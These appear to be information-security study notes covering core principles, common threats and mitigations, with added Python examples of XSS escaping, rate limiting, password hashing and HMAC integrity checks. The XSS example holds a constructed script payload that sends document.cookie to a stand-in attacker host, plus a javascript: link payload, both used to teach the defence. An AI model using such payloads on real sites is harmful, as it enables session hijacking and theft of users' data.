Information Assurance (IA) - the practice of assuring and managing the risks related to confidential information throughout the process of transmitting, processing, and storing data.

Mostly focused on the protection of the:

Confidentiality – preventing unauthorized access to information.

Integrity – ensuring information is accurate and unchanged.

Availability – making sure information is accessible when needed.

Authentication – verifying the identity of users or systems.

Non-repudiation – ensuring actions can be traced to the party that performed them and cannot later be denied.

Information Security (IS) - the practice of preventing unauthorized access, use, disclosure, disruption, modification, inspection, recording, or destruction of information.

Security Threats in Information Systems

Malware - Malicious software, such as viruses, worms, trojans, ransomware, and spyware, can infect systems and compromise their functionality, steal sensitive information, or demand ransom.

Phishing - Phishing attacks involve tricking individuals into providing sensitive information, such as usernames, passwords, or financial details, by posing as a trustworthy entity through emails, messages, or fake websites.

Denial of Service (DoS) and Distributed Denial of Service (DDoS) Attacks - These attacks aim to overwhelm a system, network, or service, making it unavailable to legitimate users. Attackers flood the target with traffic (or with requests that are cheap to send but expensive to serve), rendering it inaccessible.

Insider Threats - Employees, contractors, or other individuals with access to an organization's systems can pose a threat by intentionally or unintentionally causing harm. This may involve unauthorized access, data theft, or other malicious actions.

SQL Injection - In SQL injection attacks, attacker-controlled input is placed into an SQL query. The flaw is in the application, which builds the query by concatenating user input into the SQL text, so characters such as quotes change the query's structure and let the attacker manipulate or retrieve sensitive data.

Cross-Site Scripting (XSS) - XSS attacks involve injecting malicious scripts into web pages that are viewed by other users. The browser runs the script in the context of the site, so it can steal information such as session cookies, modify content, or perform other malicious actions on the victim's behalf.
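The XSS entry above, as an added example that is not part of the original notes: a comment renderer that pastes untrusted values into HTML, beside one that escapes each value for its context and allow-lists the link scheme. The payloads, the `attacker.example` host and the function names are constructed for the demo.

```python
import html
from urllib.parse import urlsplit

# Constructed attacker-controlled inputs; not from the original page.
SCRIPT_PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
HREF_PAYLOAD = "javascript:alert(document.cookie)"


def render_comment_vulnerable(author: str, text: str, homepage: str) -> str:
    # Vulnerable: untrusted strings go straight into the markup, so the browser
    # parses the payload as a script element and follows the javascript: link.
    return f'<p><a href="{homepage}">{author}</a>: {text}</p>'


def safe_href(url: str) -> str:
    # Escaping does not help with a javascript: URL (it is a perfectly valid
    # attribute value), so the scheme itself has to be allow-listed.
    scheme = urlsplit(url.strip()).scheme.lower()
    return url if scheme in ("http", "https") else "#"


def render_comment_safe(author: str, text: str, homepage: str) -> str:
    # Hardened: HTML-escape every untrusted value for its context (text node or
    # double-quoted attribute; html.escape also escapes quotes) and filter the URL.
    return (
        f'<p><a href="{html.escape(safe_href(homepage))}">{html.escape(author)}</a>: '
        f"{html.escape(text)}</p>"
    )


if __name__ == "__main__":
    print(render_comment_vulnerable("mallory", SCRIPT_PAYLOAD, HREF_PAYLOAD))
    print(render_comment_safe("mallory", SCRIPT_PAYLOAD, HREF_PAYLOAD))
```

In real applications this belongs in the template engine (auto-escaping on by default) plus a Content-Security-Policy header as a second layer; the point of the example is that the correct encoding depends on where the value lands, and that URL attributes need a scheme check on top of escaping.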
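The DoS entry above, as an added example (not from the original notes) of the standard per-client mitigation: a token-bucket rate limiter run over constructed traffic in which one address sends 100 requests in a second while another makes three ordinary requests. The addresses, rates and burst size are assumptions for the demo.

```python
from collections import defaultdict


class TokenBucket:
    """Per-client token bucket. Integer arithmetic (millitokens, milliseconds)
    keeps the simulation deterministic; a rate of N tokens/second is N
    millitokens/millisecond."""

    def __init__(self, rate_per_sec: int, burst: int):
        self.rate = rate_per_sec
        self.capacity = burst * 1000
        self.state = {}  # client -> (millitokens available, last seen ms)

    def allow(self, client: str, now_ms: int) -> bool:
        tokens, last = self.state.get(client, (self.capacity, now_ms))
        tokens = min(self.capacity, tokens + self.rate * (now_ms - last))
        if tokens >= 1000:
            self.state[client] = (tokens - 1000, now_ms)
            return True
        self.state[client] = (tokens, now_ms)  # a denied request still advances the clock
        return False


def constructed_traffic():
    # Constructed sample: a flood of 100 requests 10 ms apart from one client and
    # three normal requests from another in the same second.
    flood = [(t, "203.0.113.9") for t in range(0, 1000, 10)]
    legit = [(t, "198.51.100.7") for t in (0, 500, 900)]
    return sorted(flood + legit)


def simulate(requests, rate_per_sec: int = 5, burst: int = 10):
    # Returns allowed/denied counts per client for a limiter of `rate_per_sec`
    # sustained requests with a burst allowance of `burst`.
    limiter = TokenBucket(rate_per_sec, burst)
    counts = defaultdict(lambda: {"allowed": 0, "denied": 0})
    for now_ms, client in requests:
        verdict = "allowed" if limiter.allow(client, now_ms) else "denied"
        counts[client][verdict] += 1
    return dict(counts)


if __name__ == "__main__":
    print(simulate(constructed_traffic()))
```

The flooding client gets its 10-request burst plus the handful the 5/s refill permits, and the other client is untouched because buckets are keyed per source. A limiter like this handles one abusive source; a distributed flood from many addresses exhausts capacity before any per-client rule triggers, which is why the network-level controls later in these notes (filtering upstream, spare capacity, segmentation) are still needed.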
Zero-Day Exploits - Attackers exploit vulnerabilities in software or hardware that are not yet known to the vendor or the public. This gives them a window of opportunity to launch attacks before patches or updates are available.

Social Engineering - This involves manipulating individuals into divulging confidential information or performing actions that may compromise security. Techniques include pretexting, baiting, and quid pro quo.

Data Breaches - Unauthorized access to sensitive data, whether through hacking, insider threats, or other means, can lead to the exposure of personal or corporate information.

Weak Authentication and Authorization - Inadequate authentication and authorization mechanisms can allow unauthorized users to gain access to systems or sensitive information.

Physical Threats - Physical damage to hardware, such as theft, vandalism, or natural disasters, can compromise the integrity and availability of information systems.

Strategies for Mitigating Security Threats

Risk Assessment
• Identifying vulnerabilities and potential impacts.
• Conducting regular risk assessments and security audits.

Security Policies and Procedures
• Establishing comprehensive security policies and guidelines.
• Employee awareness programs and training sessions.
• Incident response plans and disaster recovery strategies.

Network Security
• Firewalls, intrusion detection and prevention systems (IDS/IPS).
• Virtual private networks (VPNs) for secure remote access.
• Network segmentation and segregation.

Data Encryption and Backup
• Encryption methods: symmetric and asymmetric encryption.
• Secure storage and transmission of sensitive data.
• Regular backups and offsite storage.

Patch Management and System Updates
• Importance of timely software updates and patches.
• Automated patch management tools and procedures.
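The "Weak Authentication and Authorization" threat above, as an added example that is not part of the original notes: the common weak pattern (a fast, unsalted hash compared with `==`) beside the hardened form (per-user random salt, a deliberately slow key-derivation function with its parameters stored alongside the digest, and a constant-time comparison). The storage format string and function names are assumptions for the demo.

```python
import hashlib
import hmac
import os
from typing import Optional


def hash_password_weak(password: str) -> str:
    # Weak: unsalted, fast hash. Identical passwords produce identical digests, and a
    # leaked table can be attacked with precomputed lookups at billions of guesses/s.
    return hashlib.sha256(password.encode()).hexdigest()


def hash_password(password: str, salt: Optional[bytes] = None, iterations: int = 600_000) -> str:
    # Hardened: per-user random salt plus PBKDF2, a deliberately slow derivation.
    # The algorithm, iteration count and salt are stored with the digest so the
    # cost can be raised later without locking existing users out.
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(stored: str, candidate: str) -> bool:
    try:
        algo, iterations, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False  # malformed record: fail closed
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", candidate.encode(), bytes.fromhex(salt_hex), int(iterations))
    # Constant-time comparison: a plain == returns at the first differing byte,
    # which leaks how much of the digest an attacker has matched.
    return hmac.compare_digest(digest, bytes.fromhex(digest_hex))


if __name__ == "__main__":
    print("weak, same digest for same password:",
          hash_password_weak("hunter2") == hash_password_weak("hunter2"))
    record = hash_password("hunter2")
    print(record)
    print("correct:", verify_password(record, "hunter2"), "wrong:", verify_password(record, "hunter3"))
```

With salting, two users who chose the same password get different records, so a cracked digest helps with exactly one account. The iteration count is a cost knob: pick the largest value the login path can afford, and rehash on successful login when a record's stored count is below the current target.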
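The Integrity principle at the top of these notes and the "secure storage and transmission of sensitive data" bullet above, as an added example that is not part of the original notes: a message authentication code (HMAC-SHA256) attached to a record so that any change in transit or at rest is detected on receipt. The key, the record contents and the wire format (`body.hex_tag`) are assumptions for the demo; confidentiality would additionally need encryption, which the Python standard library does not provide.

```python
import hashlib
import hmac
import json
from typing import Optional

# Constructed demo key; in production it comes from a secrets manager, never source code.
KEY = bytes.fromhex("0f1e2d3c4b5a69788796a5b4c3d2e1f0" * 2)


def protect(key: bytes, payload: dict) -> bytes:
    # Canonical JSON (sorted keys, no whitespace) so sender and receiver tag
    # byte-identical bodies. The tag is hex, so it never contains the "." separator.
    body = json.dumps(payload, sort_keys=True, separators=(",", ":")).encode()
    tag = hmac.new(key, body, hashlib.sha256).hexdigest().encode()
    return body + b"." + tag


def verify(key: bytes, message: bytes) -> Optional[dict]:
    # Returns the payload only if the tag matches; None on any tampering or a
    # malformed message. The comparison is constant-time.
    body, _, tag = message.rpartition(b".")
    if not body:
        return None
    expected = hmac.new(key, body, hashlib.sha256).hexdigest().encode()
    if not hmac.compare_digest(expected, tag):
        return None
    return json.loads(body)


if __name__ == "__main__":
    msg = protect(KEY, {"account": "alice", "amount": 100})
    print(msg)
    print("intact:", verify(KEY, msg))
    tampered = msg.replace(b'"amount":100', b'"amount":9999')
    print("tampered:", verify(KEY, tampered))
    print("wrong key:", verify(b"wrong key", msg))
```

A shared-key MAC gives integrity and authenticity between the two parties that hold the key, but not the non-repudiation listed among the IA goals: either holder could have produced the tag, so a dispute cannot be settled. Non-repudiation needs an asymmetric signature, where only the signer holds the private key.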